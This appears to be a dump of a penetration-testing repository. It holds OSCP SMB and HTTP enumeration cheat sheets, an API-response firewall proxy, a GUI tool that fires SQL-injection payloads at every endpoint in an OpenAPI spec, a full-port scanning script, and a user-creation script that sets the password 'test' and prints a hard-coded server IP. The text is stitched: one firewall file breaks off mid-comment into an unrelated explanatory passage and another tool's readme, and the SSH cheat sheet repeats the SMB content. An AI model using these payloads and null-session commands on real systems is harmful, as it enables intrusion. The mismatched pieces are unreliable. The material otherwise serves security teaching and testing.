| "" | rpcclient -U "" -N [ip]; smbclient \\\\[ip]\\[share name] | -U "" = null session, -N = no password. This will attempt to connect to the share. Can try without a password (or sending a blank password) and still potentially connect. | |
| Check for vulnerabilities | nmap --script smb-vuln* -p 139,445 [ip] | | |
| Overall scan | enum4linux -a [ip] | Example output is long, but some highlights to look for: output similar to nmblookup; check for null session; listing of shares; domain info; password policy; RID cycling output | |
| Manual recon | https://github.com/rewardone/OSCPRepo/blob/master/scripts/recon_enum/smbver.sh; check pcap | Run on server. Windows SMB is more complex than just a version, but looking in Wireshark will give a bunch of information about the connection. We can filter on ntlmssp.ntlmv2_response to see NTLMv2 traffic, for example. | |
--------------------------------------------------------------------------------

/OSCP/httpEnum.md:
--------------------------------------------------------------------------------
| Enumeration step | Comment | Useful reference | Goal |
|---|---|---|---|
| Nikto for mapping the files | Nikto -host http(s)://ip:port/app | | Site mapping |
| Check the robots.txt file | If you can't access it, maybe check for CSRF | | Site mapping |
| Use BURP spider ability | | | Site mapping |
| Navigate to http://ip/~root | | | ??? |
| Use CURL to find out what webserver/app you are interacting with | | | Site mapping |
| Use gobuster to map out the directories | Check for txt,php,asp,jsp,aspx,sh | | Site mapping |
| Check the source code | Look for comments, versions, hidden links, ... anything interesting | | |
| CEWL/John/hydra for password gen | | | Brute force |
| Check for vulnerable CMS and versions/ javascripts | | | Injection |
| If login page: Check for default credentials | Search Google to find default credentials (Admin/admin); try combinations of the words on the website | | Injection |
| SQL injection | https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) | | Injection |
| Command injection in PHP | The PHP exec() function makes system-level calls | | Injection/execution |
| LFI/RFI | To execute payload | | Execution |
| File upload | Web.config, aspx,php,php3,pht,aspx,txt | | FTP |
| RCE | | | |
| Look at the config files | | | |
| Look for hidden data on image tags | | | |
| Cgi-bin file enum | | | |
--------------------------------------------------------------------------------
/OSCP/smbEnum.md:
--------------------------------------------------------------------------------
| Enumeration step | Comment | Useful reference | Goal |
|---|---|---|---|
| Enumerate hostname | `nmblookup -A [ip]` | | |
| List shares | `smbmap -H [ip/hostname]` | | |
| "" | `echo exit \| smbclient -L \\\\[ip]` | `exit` takes care of any password request that might pop up, since we're checking for null login; `-L` gets a list of shares for the given host | |
| "" | `nmap --script smb-enum-shares -p 139,445 [ip]` | | |
| Check null sessions | `smbmap -H [ip/hostname]` | This command will show you the shares on the host, as well as your access to them. If you get credentials, you can re-run it to show new access | |
| "" | `rpcclient -U "" -N [ip]`; `smbclient \\\\[ip]\\[share name]` | `-U ""` null session; `-N` no password. This will attempt to connect to the share. Can try without a password (or sending a blank password) and still potentially connect. | |
| Check for vulnerabilities | `nmap --script smb-vuln* -p 139,445 [ip]` | | |
| Overall scan | `enum4linux -a [ip]` | Example output is long, but some highlights to look for: output similar to nmblookup, check for null session, listing of shares, domain info, password policy, RID cycling output | |
| Manual recon | https://github.com/rewardone/OSCPRepo/blob/master/scripts/recon_enum/smbver.sh; check pcap | Run on server. Windows SMB is more complex than just a version, but looking in Wireshark will give a bunch of information about the connection. We can filter on ntlmssp.ntlmv2_response to see NTLMv2 traffic, for example. | |

--------------------------------------------------------------------------------
/OSCP/sshEnum.md:
--------------------------------------------------------------------------------
| Enumeration step | Comment | Useful reference | Goal |
|---|---|---|---|
| Enumerate hostname | `nmblookup -A [ip]` | | |
| List shares | `smbmap -H [ip/hostname]` | | |
| "" | `echo exit \| smbclient -L \\\\[ip]` | `exit` takes care of any password request that might pop up, since we're checking for null login; `-L` gets a list of shares for the given host | |
| "" | `nmap --script smb-enum-shares -p 139,445 [ip]` | | |
| Check null sessions | `smbmap -H [ip/hostname]` | This command will show you the shares on the host, as well as your access to them. If you get credentials, you can re-run it to show new access | |
| "" | `rpcclient -U "" -N [ip]`; `smbclient \\\\[ip]\\[share name]` | `-U ""` null session; `-N` no password. This will attempt to connect to the share. Can try without a password (or sending a blank password) and still potentially connect. | |
| Check for vulnerabilities | `nmap --script smb-vuln* -p 139,445 [ip]` | | |
| Overall scan | `enum4linux -a [ip]` | Example output is long, but some highlights to look for: output similar to nmblookup, check for null session, listing of shares, domain info, password policy, RID cycling output | |
| Manual recon | https://github.com/rewardone/OSCPRepo/blob/master/scripts/recon_enum/smbver.sh; check pcap | Run on server. Windows SMB is more complex than just a version, but looking in Wireshark will give a bunch of information about the connection. We can filter on ntlmssp.ntlmv2_response to see NTLMv2 traffic, for example. | |

--------------------------------------------------------------------------------
/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-19-23.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-19-23.jpeg
--------------------------------------------------------------------------------
/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-23-14.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-23-14.jpeg
--------------------------------------------------------------------------------
/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-29-50.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-29-50.jpeg -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 1.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 10.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 11.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 12.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 12.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 13.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 14.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 15.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - 
Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 16.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 17.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 18.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 19.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 2.png 
-------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 3.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 4.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 5.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 6.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac 
da63d3dc76064964aa96d48d311abab3/Untitled 7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 7.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 8.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 9.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/burpproject.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/burpproject.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/dashboard.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/dashboard.jpeg -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/deploy.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/deploy.jpeg -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/enter_to_procee.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/enter_to_procee.jpeg -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/h1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web 
Application hac da63d3dc76064964aa96d48d311abab3/h1.png
--------------------------------------------------------------------------------
/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/heroku_terms.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/heroku_terms.jpeg
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/RatFireWall/HorridAPIResponseFirewall/firewall.py:
--------------------------------------------------------------------------------
import requests
from flask import Flask, request, jsonify

app = Flask(__name__)

PROXY_API_BASE_URL = 'https://api.example.com'  # Replace with the API you want to proxy
FORBIDDEN_KEYWORDS = ['password', 'api-key']


def inspect_response(json_data):
    # Crude check: serialise the whole document and look for any forbidden keyword
    for keyword in FORBIDDEN_KEYWORDS:
        if keyword in str(json_data).lower():
            return True
    return False


# The original route was '/' with a `path` argument that Flask never supplied;
# a path converter is needed so the requested path actually reaches the handler.
@app.route('/', defaults={'path': ''}, methods=['GET', 'POST', 'PUT', 'DELETE'])
@app.route('/<path:path>', methods=['GET', 'POST', 'PUT', 'DELETE'])
def proxy_request(path):
    upstream = f'{PROXY_API_BASE_URL}/{path}'
    if request.method == 'GET':
        response = requests.get(upstream, params=request.args)
    elif request.method == 'POST':
        response = requests.post(upstream, json=request.get_json(silent=True))
    elif request.method == 'PUT':
        response = requests.put(upstream, json=request.get_json(silent=True))
    else:  # DELETE
        response = requests.delete(upstream, params=request.args)

    # Compare the media type only, so 'application/json; charset=utf-8' is inspected too
    content_type = response.headers.get('Content-Type', '').split(';')[0].strip()
    if response.status_code == 200 and content_type == 'application/json':
        json_data = response.json()
        if inspect_response(json_data):
            return jsonify({"error": "Forbidden content in response"}), 403
        else:
            return jsonify(json_data), 200

    return response.content, response.status_code


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

--------------------------------------------------------------------------------
/RatFireWall/HorridAPIResponseFirewall/readme.md:
--------------------------------------------------------------------------------
# Outgoing API Firewall Proxy

This Python-Flask based outgoing API firewall proxy helps protect your application by inspecting JSON responses from an external API. It searches for specific forbidden keywords, such as "password" or "api-key", and blocks the response if it contains any of these words. The proxy supports GET, POST, PUT, and DELETE methods.

## Requirements
- Python 3.6 or higher
- Flask

## Installation
- Clone this repository.
- Create a virtual environment and install dependencies:

```
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```

## Configuration
Edit the app.py file and replace the PROXY_API_BASE_URL variable with the base URL of the API you want to proxy:

`PROXY_API_BASE_URL = 'https://api.example.com'`

Modify the FORBIDDEN_KEYWORDS list to include the keywords you want to block in the JSON response:

`FORBIDDEN_KEYWORDS = ['password', 'api-key']`

## Running the proxy
Start the Flask app by running:

`flask run --host=0.0.0.0 --port=8080`

This will start the proxy on port 8080. You can now send requests to http://localhost:8080 followed by the API path you want to access.

## Usage
Make requests to the proxy as you would to the actual API. For example, if the original API request is:

`GET https://api.example.com/some/endpoint?param=value`

You would make the same request to the proxy:

`GET http://localhost:8080/some/endpoint?param=value`

If the proxy detects any forbidden keywords in the JSON response, it will return a 403 Forbidden response with an error message.

## License
This project is released under the MIT License.

## Contributing
Pull requests and issues are welcome. Please feel free to contribute and help improve the project!

--------------------------------------------------------------------------------
/RatFireWall/HorridAPIResponseFirewall/requirements.txt:
--------------------------------------------------------------------------------
Flask==2.1.1
requests==2.27.1

--------------------------------------------------------------------------------
/RatFireWall/firewall.py:
--------------------------------------------------------------------------------
# The original file had no imports. `http` is mitmproxy's HTTP module; the Rule
# class is defined outside this file, so the module name below is an assumption.
from mitmproxy import http
from rules import Rule  # assumed module name


class Proxy:
    def __init__(self, rules):
        self.rules = rules

    def request(self, flow: http.HTTPFlow) -> None:
        # Check if the request matches any of the rules
        for rule in self.rules:
            if rule.matches_request(flow.request):
                # If the request matches the rule, block it.
                # Response.make takes (status_code, content, headers); the original
                # passed a fourth argument, which raises TypeError. On mitmproxy < 7
                # the class is http.HTTPResponse.
                flow.response = http.Response.make(
                    403,
                    b"Blocked by rule: %s" % rule.rule_name.encode('utf-8'),
                    {"Content-Type": "text/html"},
                )

    def response(self, flow: http.HTTPFlow) -> None:
        # Check if the response matches any of the rules
        for rule in self.rules:
            if rule.matches_response(flow.request, flow.response):
                # If the response matches the rule, block it
                flow.response = http.Response.make(
                    403,
                    b"Blocked by rule: %s" % rule.rule_name.encode('utf-8'),
                    {"Content-Type": "text/html"},
                )


# Block requests with user agent containing "curl"
rule1 = Rule("Block cURL requests", request_headers={"User-Agent": "curl"})

# Block responses with a "Set-Cookie" header
rule2 = Rule("Block Set-Cookie responses", response_headers={"Set-Cookie": "*"})

# Block requests containing
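HorridAPIResponseFirewall decides with `keyword in str(json_data).lower()`, which cannot tell a key from a value or say where the hit was, and it compares the `Content-Type` header as an exact string. The block below is an added example, not code from the repository: it walks the decoded JSON recursively and returns the JSON path of every hit, treats `application/json; charset=utf-8` and `+json` media types as JSON, and passes anything that is not JSON through unchanged, as the proxy does. It also carries a small `HeaderRule` class standing in for the `Rule` objects that RatFireWall/firewall.py is driven by; that class is not on this page, so its matching semantics here (case-insensitive substring match, `*` meaning "header present") are an assumption. The sample response body is constructed for the example.

```python
"""Added example (not the repository's own code): structured response
inspection for an outgoing API firewall, plus a header-rule matcher."""
import json

FORBIDDEN_KEYWORDS = ("password", "api-key")


def is_json_content_type(content_type):
    """True for 'application/json' and variants such as
    'application/json; charset=utf-8' or 'application/problem+json'."""
    if not content_type:
        return False
    media_type = content_type.split(";", 1)[0].strip().lower()
    return media_type == "application/json" or media_type.endswith("+json")


def find_forbidden(data, keywords=FORBIDDEN_KEYWORDS, path="$"):
    """Walk a decoded JSON document and return (json_path, kind, keyword)
    for every key or string value containing a forbidden keyword."""
    hits = []
    if isinstance(data, dict):
        for key, value in data.items():
            for kw in keywords:
                if kw in str(key).lower():
                    hits.append((f"{path}.{key}", "key", kw))
            hits.extend(find_forbidden(value, keywords, f"{path}.{key}"))
    elif isinstance(data, list):
        for i, item in enumerate(data):
            hits.extend(find_forbidden(item, keywords, f"{path}[{i}]"))
    elif isinstance(data, str):
        for kw in keywords:
            if kw in data.lower():
                hits.append((path, "value", kw))
    return hits


def should_block(content_type, body_bytes, keywords=FORBIDDEN_KEYWORDS):
    """The proxy's decision: only JSON bodies are inspected; anything else,
    including undecodable JSON, is passed through rather than blocked."""
    if not is_json_content_type(content_type):
        return False, []
    try:
        data = json.loads(body_bytes)
    except ValueError:
        return False, []
    hits = find_forbidden(data, keywords)
    return bool(hits), hits


class HeaderRule:
    """Assumed reimplementation of the Rule objects used by RatFireWall/firewall.py.
    A header pattern matches case-insensitively as a substring; '*' matches
    whenever the header is present at all."""

    def __init__(self, rule_name, request_headers=None, response_headers=None):
        self.rule_name = rule_name
        self.request_headers = request_headers or {}
        self.response_headers = response_headers or {}

    @staticmethod
    def _headers_match(expected, actual):
        lowered = {k.lower(): v for k, v in actual.items()}
        for name, pattern in expected.items():
            value = lowered.get(name.lower())
            if value is None:
                return False
            if pattern != "*" and pattern.lower() not in value.lower():
                return False
        return True

    def matches_request(self, request_headers):
        return bool(self.request_headers) and self._headers_match(self.request_headers, request_headers)

    def matches_response(self, response_headers):
        return bool(self.response_headers) and self._headers_match(self.response_headers, response_headers)


# Constructed sample: an upstream response leaking a credential in a nested value.
SAMPLE_BODY = json.dumps({
    "user": {"name": "alice", "settings": {"Password": "hunter2"}},
    "tokens": [{"type": "api-key", "value": "abc"}],
}).encode()

if __name__ == "__main__":
    blocked, hits = should_block("application/json; charset=utf-8", SAMPLE_BODY)
    print("blocked:", blocked)
    for hit in hits:
        print("  ", hit)
```

Returning the JSON path of each hit is what makes the 403 actionable for the application owner: the log can say which field of which upstream response leaked, instead of only that "something" matched.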
## 🧪 Sample Use Case

- Test for SQLi: load `sqli.txt` from PREPOPLISTS, click fuzz
- Use `FUZZ` keyword in body/URL to dynamically inject each value
- Monitor results and status codes for anomalies

## 🛠 Tech Stack

- Python 3
- `Tkinter` for GUI
- `Requests` for HTTP handling
- JSON for Swagger parsing and data exchange

## 🧑‍💻 Author

Developed by **THE XSSRAT**
## 📜 License

MIT License – feel free to use and modify with credit.

--------------------------------------------------------------------------------
/Scripts/RatAPIChat/SQLiByAPISpec.py:
--------------------------------------------------------------------------------
import tkinter as tk
from tkinter import messagebox, scrolledtext, filedialog
import json
import time
import threading
import requests


# Function to load OpenAPI specification from a local file
def load_openapi_spec(file_path):
    try:
        with open(file_path, 'r') as file:
            return json.load(file)
    except Exception as e:
        messagebox.showerror("Error", f"An error occurred while loading the OpenAPI spec: {e}")
        return None


# Tkinter widgets may only be used from the main thread. Worker threads hand
# their output to the event loop via root.after() instead of calling insert()
# directly, which is what the original did.
def log(message):
    root.after(0, lambda: result_text.insert(tk.END, message))


# Function to test an endpoint for SQL injection
def test_endpoint(base_url, path):
    url = base_url + path
    payloads = ["' OR '1'='1", '" OR "1"="1', "admin'--", 'admin"--']
    for payload in payloads:
        # Note: the parameter name is hard-coded; the spec's own parameters are not used
        test_url = f"{url}?param={payload}"
        try:
            response = requests.get(test_url, timeout=10)
            if "error" in response.text.lower():  # Simplified check for SQL error
                log(f"Potential SQLi detected at {test_url}\n")
            time.sleep(1)  # To avoid overwhelming the server
        except Exception as e:
            log(f"Error testing {test_url}: {e}\n")


# Function to start testing all endpoints
def start_testing():
    base_url = baseurl_entry.get()
    if not base_url:
        messagebox.showerror("Input Error", "Please enter the Base URL.")
        return

    file_path = file_entry.get()
    if not file_path:
        messagebox.showerror("Input Error", "Please load a valid OpenAPI file.")
        return

    spec = load_openapi_spec(file_path)
    if spec:
        paths = spec.get('paths', {})
        for path in paths:
            threading.Thread(target=test_endpoint, args=(base_url, path), daemon=True).start()
    else:
        messagebox.showerror("Error", "Invalid OpenAPI specification.")


# Function to browse and load the OpenAPI file
def browse_file():
    file_path = filedialog.askopenfilename(filetypes=[("JSON Files", "*.json")])
    if file_path:
        file_entry.delete(0, tk.END)
        file_entry.insert(0, file_path)


# Set up the GUI
root = tk.Tk()
root.title("API SQL Injection Tester")

# Base URL input
tk.Label(root, text="Base URL:").pack(pady=5)
baseurl_entry = tk.Entry(root, width=80)
baseurl_entry.pack(pady=5)

# File path input
tk.Label(root, text="OpenAPI File:").pack(pady=5)
file_entry = tk.Entry(root, width=80)
file_entry.pack(pady=5)

# Browse button for file
browse_button = tk.Button(root, text="Browse", command=browse_file)
browse_button.pack(pady=5)

# Start button
start_button = tk.Button(root, text="Start Testing", command=start_testing)
start_button.pack(pady=20)

# Results display
result_text = scrolledtext.ScrolledText(root, height=20, width=80)
result_text.pack(pady=5)

root.mainloop()

--------------------------------------------------------------------------------
/Scripts/RatAPIChat/readme.md:
--------------------------------------------------------------------------------
# API Request Tool

This tool allows you to send HTTP requests to a specified API endpoint, perform fuzzing on request parameters, and save/load your session history. It also supports authentication, proxy configuration, and the ability to load Swagger/OpenAPI definitions.

## Features

- **Send API requests** with different HTTP methods (`GET`, `POST`, `PUT`, `DELETE`).
- **Authentication Support**: Basic, Bearer, and OAuth 2.0.
- **Fuzzing Parameters**: Allows you to fuzz request parameters by replacing `FUZZ` in the body with values from a list.
- **Session Management**: Save and load API request history.
- **Swagger/OpenAPI Import**: Import Swagger/OpenAPI definitions to automatically generate endpoints and request bodies.
- **Export History**: Export request history to a CSV file.
- **Proxy Support**: Support for setting up a proxy server (with Burp Suite certificate support).

## Installation

To install the required dependencies using Python 3 and `venv`, follow these steps:

**Set up a virtual environment:**

```
python3 -m venv venv
```

**Activate the virtual environment:**

### On macOS/Linux:

```
source venv/bin/activate
```

### On Windows:

```
.\venv\Scripts\activate
```

### Install the required dependencies:

```
pip install -r requirements.txt
```

## Usage
- API Endpoint: Enter the API endpoint URL.
- Authentication: Select the type of authentication (Basic, Bearer, or OAuth 2.0). Enter the corresponding credentials or token.
- Method: Choose the HTTP method (GET, POST, PUT, DELETE).
- Request Body: For POST, PUT, and DELETE requests, enter the request body. You can use FUZZ as a placeholder to be replaced with fuzzing values.
- Fuzzing: You can select pre-populated fuzzing lists or manually enter fuzz values to test your API endpoints with multiple values.
- Proxy: Configure a proxy URL if needed.
- Response: After sending the request, the response (status code and body) will be shown in the response section.
- History: View a list of all previous requests and responses. You can select an entry to pre-populate the request fields.
- Save/Load Session: Save your session to a file or load a previously saved session to continue your work.

## Files
- requirements.txt: List of required Python packages.
- last_session.json: Stores the history of your API requests.
- preferences.json: Stores user preferences like proxy settings and Burp Suite certificate path.
- burp_cert.pem: Burp Suite certificate for proxying HTTPS requests.
- PREPOPLISTS: Folder containing pre-populated fuzzing lists.

## License
This project is licensed under the MIT License - see the LICENSE file for details.

--------------------------------------------------------------------------------
/Scripts/RatAPIChat/requirements.txt:
--------------------------------------------------------------------------------
requests
tkinter

--------------------------------------------------------------------------------
/Scripts/RatAPIChat/test.json:
--------------------------------------------------------------------------------
[]

--------------------------------------------------------------------------------
/Scripts/addUser.sh:
--------------------------------------------------------------------------------
#!/bin/bash
echo "Enter the user name: "
read -r userName

# Reject anything that is not a plain account name before it reaches useradd or sudoers
if ! [[ "$userName" =~ ^[a-z_][a-z0-9_-]*$ ]]; then
    echo " ERR -- invalid user name" >&2
    exit 1
fi

# -m creates the home directory; the group "Commands" must already exist
sudo useradd -m -g Commands -d "/home/$userName" "$userName"
# 750 instead of the original 767: a world-writable home lets any local user plant files in it
sudo chmod 750 "/home/$userName/"

# Write the rule to sudoers.d and validate it with visudo instead of appending to /etc/sudoers.
# Note that "apt-get install *" also matches extra apt-get options passed after "install".
echo "$userName ALL=(ALL) NOPASSWD:/usr/bin/apt-get install *" | sudo tee "/etc/sudoers.d/$userName" > /dev/null
sudo visudo -cf "/etc/sudoers.d/$userName" || { sudo rm -f "/etc/sudoers.d/$userName"; echo " ERR -- sudoers rule rejected"; exit 1; }
sudo chmod 440 "/etc/sudoers.d/$userName"

echo "$userName:test" | sudo chpasswd > /dev/null 2>&1 && echo " User account has been created." || echo " ERR -- User account creation failed!"

echo "ssh $userName@45.79.218.21 - password is 'test' please change it ASAP"

--------------------------------------------------------------------------------
/Scripts/autoScan.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Check if the target argument was provided
if [ $# -ne 1 ]; then
    echo "Usage: $0 <target>"
    echo "  where target can be a single IP address, range of IP addresses, or a subnet in CIDR notation"
    exit 1
fi

target=$1

# Run Naabu scan on all TCP and UDP ports
naabu -h "$target" -p-u > naabu_output.txt

# Run Masscan scan on all TCP and UDP ports
masscan "$target" -p- --rate=10000 > masscan_output.txt

# Run Recon-ng scan
recon-ng -r "$target" > recon-ng_output.txt

# Run Nmap scan on all TCP and UDP ports (SYN and UDP scans need root)
nmap -sS -sU -p- -A "$target" > nmap_output.txt

# Check if a web port was found
if grep -q "80/tcp" nmap_output.txt || grep -q "443/tcp" nmap_output.txt; then
    echo "Web port found, running additional web tools..."
    # Run Gobuster scan
    gobuster dir -u "http://$target" -w /usr/share/wordlists/dirb/common.txt > gobuster_output.txt

